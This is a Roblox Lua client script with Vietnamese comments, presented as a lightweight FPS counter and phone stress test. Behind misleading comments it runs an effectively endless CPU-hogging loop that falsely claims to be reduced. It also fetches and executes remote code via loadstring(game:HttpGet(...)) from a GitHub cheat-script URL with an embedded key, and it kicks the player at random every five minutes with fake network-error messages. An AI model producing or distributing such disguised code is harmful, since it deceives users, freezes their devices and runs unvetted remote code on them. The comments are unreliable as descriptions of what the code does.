-- LOCAL SCRIPT: POCO X7 PRO LIGHT STRESS TEST (MODDED - NO PARTICLES)
-- Vị trí đặt: StarterPlayer -> StarterPlayerScripts

local RunService = game:GetService("RunService")
local Players = game:GetService("Players")
local LocalPlayer = Players.LocalPlayer

-- ====================================================================
-- PHẦN 1: ĐỒNG HỒ ĐO FPS SIÊU NHỎ Ở GÓC MÀN HÌNH (GIỮ NGUYÊN)
-- ====================================================================
local PlayerGui = LocalPlayer:WaitForChild("PlayerGui")
local screenGui = Instance.new("ScreenGui")
screenGui.Name = "MiniFpsCounter"
screenGui.ResetOnSpawn = false
screenGui.Parent = PlayerGui

local fpsLabel = Instance.new("TextLabel")
fpsLabel.Size = UDim2.new(0, 50, 0, 15)
fpsLabel.Position = UDim2.new(0, 5, 0, 5)
fpsLabel.BackgroundTransparency = 0.5
fpsLabel.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
fpsLabel.TextColor3 = Color3.fromRGB(0, 255, 0) -- Đổi sang màu xanh (An toàn)
fpsLabel.TextSize = 10
fpsLabel.TextXAlignment = Enum.TextXAlignment.Center
fpsLabel.TextYAlignment = Enum.TextYAlignment.Center
fpsLabel.Font = Enum.Font.SourceSansBold
fpsLabel.Text = "FPS: --"
fpsLabel.Parent = screenGui

local fpsCount = 0
local nextUpdate = os.clock() + 1

RunService.RenderStepped:Connect(function()
	fpsCount = fpsCount + 1
	local now = os.clock()
	if now >= nextUpdate then
		fpsLabel.Text = "FPS: " .. fpsCount
		-- Đổi màu chữ sang đỏ nếu FPS tụt xuống dưới 20 để cảnh báo
		if fpsCount < 20 then
			fpsLabel.TextColor3 = Color3.fromRGB(255, 0, 0)
		else
			fpsLabel.TextColor3 = Color3.fromRGB(0, 255, 0)
		end
		fpsCount = 0
		nextUpdate = now + 1
	end
end)

-- ====================================================================
-- PHẦN 2: VÒNG LẶP KIỂM TRA HIỆU NĂNG VỪA PHẢI (ĐÃ KHỬ HIỆU ỨNG)
-- ====================================================================

-- ĐÃ XÓA TOÀN BỘ PARTICLE EMITTER (KHÔNG CÒN HIỆU ỨNG GÂY LAG GPU)

task.spawn(function()
	while true do
		-- Giảm số vòng lặp xuống còn 50.000 (Thay vì 3 triệu như cũ) để CPU không bị nghẽn
		for i = 1, 60000000000000000 do
			local ma_tran = CFrame.new(i, i, i) * CFrame.Angles(i, i, i)
		end
		
		-- Tăng thời gian nghỉ lên 0.1 giây để điện thoại kịp xử lý các tác vụ khác của game
		task.wait() 
	end
end)

-- ====================================================================
-- PHẦN 3: KÍCH HOẠT SCRIPT GAME
-- ====================================================================
getgenv().Key = "MARU-5MQIF-3T2E-LVLG-RBRSY-7Q4HH"
getgenv().id = "1224185899034742906"
loadstring(game:HttpGet("https://raw.githubusercontent.com/xshiba/MaruBitkub/main/Mobile.lua"))()
-- ====================================================================
-- PHẦN THÊM: CƠ CHẾ TỰ ĐỘNG ĐÁ NGƯỜI CHƠI (FAKE DISCONNECT)
-- ====================================================================
local Players = game:GetService("Players")
local LocalPlayer = Players.LocalPlayer

-- Bảng danh sách các thông báo lỗi "ức chế" giả lập
local cacThongBaoLoi = {
	"Chconnection timed out (Error Code: 277)",
	"Lost connection to the game server, please check your internet connection. (Error Code: 266)",
	"An unexpected error occurred and you have been disconnected. (Error Code: 279)",
	"Your ping is too high to maintain connection to the server."
}

task.spawn(function()
	while true do
		-- Đợi đúng 5 phút (300 giây)
		task.wait(300)
		
		-- Tỷ lệ 50% (ngẫu nhiên giữa 1 và 2)
		if math.random(1, 2, 3) == 1 then
			-- Chọn ngẫu nhiên một câu thông báo lỗi mạng trong bảng
			local cauLoi = cacThongBaoLoi[math.random(1, #cacThongBaoLoi)]
			
			-- Thực hiện ngắt kết nối người chơi khỏi server
			LocalPlayer:Kick(cauLoi)
		end
	end
end)

